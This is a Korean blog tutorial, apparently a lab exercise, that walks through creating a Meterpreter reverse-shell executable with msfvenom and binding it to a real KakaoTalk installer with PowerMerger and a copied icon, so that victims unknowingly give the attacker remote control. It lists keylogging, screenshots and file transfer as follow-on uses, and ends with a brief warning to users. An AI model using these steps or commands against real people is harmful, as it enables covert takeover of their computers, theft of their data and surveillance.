[Kali Linux] 설치 파일을 위변조하여 사용자 권한 탈취 (Reverse Shell)

msfvenom를 활용하여 사용자의 권한을 탈취할 수 있는 악성파일을 만든다

사용자가 변조된 파일을 실행하게 되면 사용자의 PC에서 공격자의 칼리로 Reverse Shell을 시도한다.

Kali Linux 공격자

Windows 10 공격 대상

( Kali ) 10.211.55.13에서 ( Windows10 ) 10.211.55.19 같은 대역에 있는 PC를 대상으로 공격을 진행한다.

 

# msfvenom -l payloads | grep "reverse"

타깃의 PC 환경이 Windows 10 , 리버스 공격을 진행할 것이므로 해당 항목이 포함된 페이로드를 선택한다.

 

 

# msfvenom -p windows/meterpreter/reverse_tcp 
lhost=10.211.55.13 lport=4403 -f exe -o /home/parallels/Desktop/hack.exe

lhost : 로컬 호스트 아이피 , 공격자인 칼리의 아이피

lport : 로컬 호스트 포트 , 사용중인 포트를 제외하고 입력

-f : 파일의 형태

-o : 출력 경로/생성할 이름

 

만들어진 hack.exe

Start.rc

# msfconsole -r Start.rc

 

타겟에서 Reverse Shell을 하기 위해 지정해준 포트를 열어줘야 한다.

편의를 위해 Start.rc 파일을 만들어 준 뒤 실행되도록 하였다.

 

이후 타겟 윈도우에서 hack.exe 파일을 실행하면 Reverse Shell이 이루어진다.

 

 

만들어진 파일을 타깃의 윈도우에서 실행하면 Reverse Shell이 이루어진다.

하지만 사용자는 의심스러운 해당 파일을 실행하지 않을 것이다.

보다 자연스러운 파일을 만들기 위해 설치 파일과 해당 파일을 조합하여 사용자는 설치 파일을 실행하였지만

이어서 실행되는 hack.exe파일로 인해 자연스러운 Reverse Shell을 유도한다.

 

PowerMerger라는 도구를 활용하여 조합하고자 한다.

png, exe, bat, zip 확장자 등 다양한 확장자의 파일들과 조합이 가능하다. 

PowerMerger

Icon : ico 파일을 지정

1st : 첫 번째로 실행되는 파일

2nd : 두 번째로 실행되는 파일

 

최종 완성된 파일

 

첫 번째 파일은 PowerMerger로 만들어진 카카오톡 설치 파일 + Hack.exe 파일이다

해당 파일을 실행할 시 카카오톡 설치 프로그램이 실행되면서 실행된 이후 Hack.exe가 이이어서 실행된다

 

중간에 카카오톡은 실제 카카오톡 설치 파일이다.

세 번째 파일은 첫 번째 PowerMerger로 만들어진 파일의 아이콘을 변경해주었다.

사용자 입장에서 실제 카카오톡 설치 파일과 변조된 파일을 구분하기에는 쉽지 않아 보인다.

 

타깃에서 변조된 설치 파일을 실행한 뒤 칼리에서 세션이 열린 것을 확인할 수 있다.

 

이후 다양한 명령을 통해 정보를 수집할 수도 있고 악의 적인 목적으로 활용 가능하다.

키보드, 마우스 이벤트를 수집, 사용자 PC 화면 스크린샷, 네트워크 정보 조회, 업로드 다운로드 등 다양하게 활용 가능하다.

자세한 명령 정보는 help를 통해 확인할 수 있다.

 

 

칼리에서는 세션을 전환하면서 여러 PC를 동시에 접근할 수 있다. 

공격자는 마음만 먹으면 다양한 파일들을 위변조 하여 사용자를 공격할 수 있다.

사용자는 공식적인 경로를 통해 파일을 다운로드하여야 하며

불법적인 파일 혹은 의심스러운 파일은 실행하지 말아야 한다.